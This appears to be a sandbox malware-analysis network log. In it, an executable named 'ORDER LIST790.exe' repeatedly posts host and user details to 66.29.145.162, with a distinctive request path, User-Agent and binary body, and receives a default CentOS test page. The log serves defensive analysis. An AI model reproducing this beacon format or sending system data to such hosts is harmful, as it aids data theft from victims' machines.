Aug 11, 2022 05:37:23.228157997 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.395914078 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:23.396012068 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.563275099 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124579906 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124609947 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124631882 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124653101 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124672890 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124700069 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:24.124749899 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:24.124942064 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.179301023 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.344233990 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:26.344449043 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.351785898 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.516570091 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:26.520668030 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.685410023 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252741098 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252801895 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252851963 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252891064 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252917051 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.253021002 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:27.253202915 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:27.253220081 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.072700024 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.240042925 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:28.240178108 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.256445885 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.423341990 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:28.423455954 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.590348005 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144061089 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144119978 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144170046 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144268990 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144273043 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144311905 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144356966 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144377947 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144434929 CEST	49743	80	192.168.2.3	66.29.145.162

HTTP Request Dependency Graph

66.29.145.162

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49741	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:23.228157997 CEST	1021	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 190 Connection: close
Aug 11, 2022 05:37:23.396012068 CEST	1021	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz642294DESKTOP-716T771k08F9C4E9C79A3B52B3F739430EEgUb
Aug 11, 2022 05:37:24.124579906 CEST	1023	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:23 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Aug 11, 2022 05:37:24.124609947 CEST	1024	IN	Data Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20 Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Aug 11, 2022 05:37:24.124631882 CEST	1026	IN	Data Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70 Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Aug 11, 2022 05:37:24.124653101 CEST	1027	IN	Data Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75 Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49742	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:26.351785898 CEST	1028	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 190 Connection: close
Aug 11, 2022 05:37:26.520668030 CEST	1028	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz642294DESKTOP-716T771+08F9C4E9C79A3B52B3F739430tHvPH
Aug 11, 2022 05:37:27.252741098 CEST	1030	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:26 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Aug 11, 2022 05:37:27.252801895 CEST	1031	IN	Data Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20 Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Aug 11, 2022 05:37:27.252851963 CEST	1032	IN	Data Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70 Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Aug 11, 2022 05:37:27.252891064 CEST	1034	IN	Data Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75 Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49743	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:28.256445885 CEST	1034	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 163 Connection: close
Aug 11, 2022 05:37:28.423455954 CEST	1035	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 34 00 32 00 32 00 39 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz642294DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 05:37:29.144061089 CEST	1036	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 